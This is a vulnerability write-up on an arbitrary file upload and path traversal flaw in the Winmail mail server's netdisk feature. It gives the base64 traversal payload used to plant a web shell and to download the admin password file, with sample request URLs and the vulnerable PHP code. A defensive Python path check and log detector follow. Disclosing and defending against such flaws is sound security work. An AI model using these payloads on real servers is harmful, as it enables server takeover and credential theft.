Winmail mail server management system: insufficient filtering leads to arbitrary file upload
You need to log in to the mailbox as an ordinary user. After logging in there is a network disk (netdisk) feature; pick any file and upload it via the file upload option.
Upload URL:
http://xxx.xxx.xxx.xxx:6080/main.php?sessid=5772430e1cd708d2521d9a0dedadd904&act=netdisk&opt=html5upload&ftpfolder=Ly4uLy4uL3dlYm1haWwvd3d3Lw==&retid=0.8386508285207916
Intercept the request with Burp Suite. It contains an ftpfolder parameter which is base64-encoded; decoded, its value is /. Change ftpfolder to /../../webmail/www/ and base64-encode it again. The directory that / originally maps to is server/netstore/test (the user's directory).
Getshell succeeded!
In the same way, when downloading a file, changing the filename parameter to traverse to data/adminuser.cfg lets you download the administrator users' passwords; the passwords are MD5-hashed.
/main.php?sessid=6ca89212aceb7b4b6997d3b1b4b9eaf0&act=netdisk&opt=download&ftpfolder=Lw%3D%3D&filename=cGhwaW5mby5waHA%3D&retid=33938934
The corresponding code (the download branch of the netdisk handler):

```php
case 'download':
    // $filename and $ftpfolder both come from the request; only the base64
    // encoding is undone, and neither value is checked for ".." components
    $filename = base64_decode($filename);
    $ftpfile = $ftpfolder;
    if (substr($ftpfile, -1) != '/')
        $ftpfile .= '/';
    $ftpfile .= $filename;
    header('Content-type: application/force-download');
    header('Content-Disposition: attachment; filename="'.$filename.'"');
    // the user-controlled relative path is appended to the netdisk home
    // directory as-is, so it can resolve to any file the web server can read
    $localfile = $ftphandle->ftp_home_directory.$ftpfile;
    //if(file_exists($localfile))
    //die($localfile);
    if (file_exists($localfile)) {
        $length = filesize($localfile);
        header('Accept-Ranges: bytes');
        header('Content-Length: '.$length);
        $fp = fopen($localfile, "rb");
        if ($fp){
            while(!feof($fp))
                echo fread($fp, 655360);
            fclose($fp);
        }
    }
```
The other branches are much the same, so I won't paste them.
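As an added defender's example (not Winmail's code), the following Python shows the check the download branch above lacks: both base64 parameters are decoded, joined under the user's netdisk home, canonicalized, and refused if the result lands outside that home; a second helper flags logged main.php netdisk requests whose decoded parameters contain a parent-directory component. The home directory path and the parameter names are assumptions modelled on the PHP excerpt.

```python
import base64
import binascii
import os
from urllib.parse import urlparse, parse_qs


def decode_b64_param(value):
    """Decode a base64 query value the way the netdisk handler does; None if invalid."""
    try:
        return base64.b64decode(value, validate=True).decode("utf-8")
    except (binascii.Error, UnicodeDecodeError):
        return None


def resolve_netdisk_path(home, ftpfolder_b64, filename_b64):
    """Hardened counterpart of the download branch.

    Returns the absolute file path to serve, or None when the request must be
    rejected because the decoded folder/filename escape the user's home.
    """
    folder = decode_b64_param(ftpfolder_b64)
    name = decode_b64_param(filename_b64)
    # The filename must be a single path component; the folder may be nested.
    if folder is None or name is None or not name or "/" in name or "\\" in name:
        return None
    home = os.path.realpath(home)
    candidate = os.path.realpath(os.path.join(home, folder.lstrip("/"), name))
    # Compare against home plus a separator so that "/home2" cannot pass as "/home".
    if candidate != home and not candidate.startswith(home + os.sep):
        return None
    return candidate


def traversal_in_request(url):
    """Detection helper for access logs: True if a netdisk request carries a
    base64 ftpfolder or filename that decodes to a path containing '..'."""
    qs = parse_qs(urlparse(url).query)
    if qs.get("act") != ["netdisk"]:
        return False
    for key in ("ftpfolder", "filename"):
        for raw in qs.get(key, []):
            decoded = decode_b64_param(raw)
            if decoded is not None and ".." in decoded.replace("\\", "/").split("/"):
                return True
    return False
```

Running `traversal_in_request` over the two URLs quoted in this report flags the upload request (its ftpfolder decodes to /../../webmail/www/) and passes the plain download of phpinfo.php from /.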